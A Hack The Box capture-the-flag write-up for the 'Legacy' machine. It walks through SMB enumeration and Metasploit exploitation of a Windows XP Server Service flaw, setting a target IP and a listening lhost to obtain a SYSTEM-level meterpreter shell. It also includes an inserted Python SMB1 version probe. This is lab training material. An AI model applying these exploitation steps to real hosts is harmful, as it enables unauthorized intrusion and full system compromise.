
Legacy HTB Write-Up

Writer: JoshLHacking

First, we start with an Nmap Scan:



The Nmap output shows that the host is running SMB and identifies the OS as Windows XP (Windows 2000 LAN Manager).


In every Assignment/Capture the Flag I do, SMB is normally the first thing to enumerate.

To look for an exploitable SMB vulnerability, we first need to identify which version of SMB the target is running.

Metasploit includes a really useful auxiliary module that scans a target for the SMB version it is using.

Loaded up Metasploit:



set rhosts 10.10.10.4

Enter run or exploit to start the scanner.


This tells us that the 'Host is running Windows XP SP3'.
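The same SMB version check, written from the inventory side as an added example (not code from this post or from Metasploit): it sends an SMB1 NEGOTIATE offering both an SMB1 and an SMB2 dialect and reports whether the host only negotiates SMB1, which is what a legacy host like this one does. The host argument is assumed; the packet layout follows the SMB1/SMB2 negotiate formats.

```python
import socket
import struct
import sys

# Dialects offered in the request; the server answers with an index into this list.
DIALECTS = ["NT LM 0.12", "SMB 2.002"]


def build_negotiate(dialects=DIALECTS):
    """Build a NetBIOS-framed SMB1 NEGOTIATE request offering the given dialects."""
    header = struct.pack(
        "<4sBIBHH8sHHHHH",
        b"\xffSMB", 0x72,       # protocol id, SMB_COM_NEGOTIATE
        0, 0x18, 0xC853, 0,     # NT status, flags, flags2 (unicode, NT status, ext. security), PID high
        b"\x00" * 8, 0,         # security features, reserved
        0xFFFF, 0xFEFF, 0, 0,   # TID, PID low, UID, MID
    )
    data = b"".join(b"\x02" + d.encode() + b"\x00" for d in dialects)
    body = header + b"\x00" + struct.pack("<H", len(data)) + data  # WordCount=0, ByteCount, dialects
    return b"\x00" + struct.pack(">I", len(body))[1:] + body  # NetBIOS session header: type 0 + 3-byte length


def parse_negotiate_response(raw, dialects=DIALECTS):
    """Classify a negotiate response: ('SMB2+', None), ('SMB1', dialect) or ('none', None)."""
    smb = raw[4:]  # strip the NetBIOS session header
    if smb[:4] == b"\xfeSMB":
        return ("SMB2+", None)  # server upgraded to SMB2/3, so it is not SMB1-only
    if smb[:4] != b"\xffSMB" or len(smb) < 35:
        raise ValueError("not an SMB negotiate response")
    index = struct.unpack_from("<H", smb, 33)[0]  # DialectIndex: first parameter word after WordCount
    if index == 0xFFFF or index >= len(dialects):
        return ("none", None)  # none of the offered dialects was accepted
    return ("SMB1", dialects[index])


def probe(host, port=445, timeout=3.0):
    """Send one negotiate to a host and return its classification (needs network access)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate())
        return parse_negotiate_response(s.recv(4096))


if __name__ == "__main__":  # usage: python smb1_check.py <host>  (host is assumed, e.g. 10.10.10.4)
    family, dialect = probe(sys.argv[1])
    verdict = "LEGACY (SMB1 only)" if family == "SMB1" else family
    print(f"{sys.argv[1]}: {verdict} {dialect or ''}".rstrip())
```

A host that answers "LEGACY (SMB1 only)" cannot speak SMB2, which is the same signal the Metasploit scanner above turns into an OS fingerprint.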

Putting this in a Google search tells us that this version of Microsoft Server Service is vulnerable to Relative Path Stack Corruption.

The link above shows us the Metasploit module to use to exploit this.


First we must use:


Then set the following options:

set rhosts 10.10.10.4

set lhost tun0


We can then enter run or exploit to start the exploit.

This got us a meterpreter shell, and we can enter getuid to see which user we are logged in as.

This told us that we are NT Authority, and so no privilege escalation is required.

We can now cd into the Administrator Desktop directory, and use the type command to output the flag.

Congratulations, you pwned this box!!


©2022 by Hack The Box Write-Ups By Josh Lees
